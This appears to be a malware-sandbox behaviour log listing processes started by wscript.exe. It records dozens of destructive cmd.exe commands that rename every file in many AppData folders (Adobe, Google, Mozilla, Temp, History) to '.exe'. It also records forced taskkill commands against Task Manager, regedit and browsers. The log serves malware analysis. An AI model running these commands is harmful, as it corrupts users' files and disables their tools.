    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Temporary Internet Files\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\en-ZW\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\es-419\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\es-BO\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\MSHist012023100420231005\*.*" "*.exe"Jump to behavior
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im notepad.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im bing.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im microsoftedge.exeJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\blob_storage\336a045b-df12-4067-9f71-93ee2edb038d\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\wasm\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\sophia\acrobat\files\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\network\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\cache\cache_data\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\js\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\js\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\wasm\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\local storage\leveldb\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\connecteddevicesplatform\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\placeholdertilelogofolder\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\temporary internet files\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\sophia\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\sophia\acrobat\files\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\blob_storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\local storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\wasm\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\arm\{291aa914-a987-4ce9-bd63-0c0a92d435e5}\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\color\profiles\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\comms\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\d3dscache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\history\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\mozilla\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\soliddocuments\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\color\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\sophia\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\sophia\acrobat\files\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\blob_storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\local storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\session storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\js\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\wasm\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\js\index-dir\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\local storage\leveldb\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\arm\{291aa914-a987-4ce9-bd63-0c0a92d435e5}\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\color\profiles\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\connecteddevicesplatform\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\d3dscache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\history\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\mozilla\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\packages\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\placeholdertilelogofolder\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\publishers\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temp\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\temporary internet files\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\arm\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\sophia\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\code cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\local storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\network\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\cache\session storage\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\connecteddevicesplatform\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\d3dscache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\google\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\packages\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\peerdistrepub\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\placeholdertilelogofolder\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\publishers\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\soliddocuments\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\cache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrobat\dc\sophia\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\acrocef\dc\acrobat\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\arm\acrobat_23.006.20320\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\adobe\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\comms\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\d3dscache\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\placeholdertilelogofolder\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\publishers\*.*" "*.exe"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\soliddocuments\*.*" "*.exe"
